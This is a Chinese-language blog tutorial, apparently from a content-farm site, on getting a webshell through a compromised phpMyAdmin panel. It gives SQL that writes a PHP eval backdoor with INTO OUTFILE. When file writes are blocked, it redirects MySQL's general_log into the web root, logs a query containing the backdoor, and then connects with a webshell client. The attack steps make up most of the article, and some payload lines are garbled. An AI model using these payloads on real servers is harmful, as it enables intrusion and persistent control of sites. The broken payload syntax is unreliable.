共計 1643 個字符，預計需要花費 5 分鐘才能閱讀完成。

自動寫代碼機器人，免費開通

這篇文章主要介紹了 phpmyadmin 中 getshell 有什么用，具有一定借鑒價值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓丸趣 TV 小編帶著大家一起了解一下。

phpMyAdmin 是一個以 PHP 為基礎，以 Web-Base 方式架構在網站主機上的 MySQL 的數據庫管理工具，讓管理者可用 Web 接口管理 MySQL 數據庫。借由此 Web 接口可以成為一個簡易方式輸入繁雜 SQL 語法的較佳途徑，尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在于由于 phpMyAdmin 跟其他 PHP 程式一樣在網頁服務器上執行，但是您可以在任何地方使用這些程式產生的 HTML 頁面，也就是于遠端管理 MySQL 數據庫，方便的建立、修改、刪除數據庫及資料表。也可借由 phpMyAdmin 建立常用的 php 語法，方便編寫網頁時所需要的 sql 語法正確性。

通俗的講 其作用就是可以在 web 頁面方便的操作數據庫。

當我們得到一個站點的 phpmyadmin 頁面時，下一步要做的就是 getshell。

可以通過寫 shell 進行提權，而我們需要滿足以下條件：

1. 數據庫 root 權限

2. 知道網站的物理路徑

3. 數據庫有寫權限

通過  select ?php eval($_POST=[123];)? INTO OUTFILE 網站物理路徑 寫入 shell

本文主要講的是在條件 3 不滿足的情況下成功 getshell。

利用條件：MySQL 5.0+

MySQL 5.0+ 的版本會自動創建日志文件，那么在服務運行的情況下修改全局變量也是可以變動文件位置的，但是必須要對生成日志的目錄有可讀可寫的權限。

（Linux 環境下可能會比較苛刻，因為站點目錄是一個用戶，MySQL 是另外一個用戶，權限管控較為嚴格，主要取決于權限配置是否得當）

首先我們測試站點是否有寫權限

執行 sql 語句               SHOW VARIABLES LIKE secure_file_priv

sql 語句 SHOW VARIABLES LIKE secure_file_priv   進行查詢 查找 secure_file_priv

secure-file-priv 特性
secure-file-priv 參數是用來限制 LOAD DATA, SELECT … OUTFILE, and LOAD_FILE() 傳到哪個指定目錄的。

當 secure_file_priv 的值為 null，表示限制 mysql 不允許導入 | 導出

當 secure_file_priv 的值為 /tmp/，表示限制 mysql 的導入 | 導出只能發生在 /tmp/ 目錄下

當 secure_file_priv 的值沒有具體值時，表示不對 mysql 的導入 | 導出做限制

可以在 mysql-ini 文件中設置其屬性

經測試，我們沒有寫權限

然后再介紹兩個 MySQL 全局變量（general_log、general_log file）

general log 指的是日志保存狀態，一共有兩個值（ON/OFF）ON 代表開啟 OFF 代表關閉。

general log file 指的是日志的保存路徑。

我們可以通過將一句話木馬寫入 mysql 日志中然后移動 mysql 日志路徑到網站目錄下實現 getshell

執行 sql 語句   SHOW VARIABLES LIKE general_log%   進行模糊查詢

日志默認關閉

我們執行 sql 語句

set global general_log =  ON  # 開啟日志
SET global general_log_file= 網站下物理路徑  # 更換日志路徑

成功創建

然后執行特殊的查詢語句

select  ?php eval($_POST[aaa]);?

我們進入 112233.php 進行驗證，成功寫入 shell

最后進行菜刀連接，獲得站點 webshell

感謝你能夠認真閱讀完這篇文章，希望丸趣 TV 小編分享的“phpmyadmin 中 getshell 有什么用”這篇文章對大家有幫助，同時也希望大家多多支持丸趣 TV，關注丸趣 TV 行業資訊頻道，更多相關知識等著你來學習!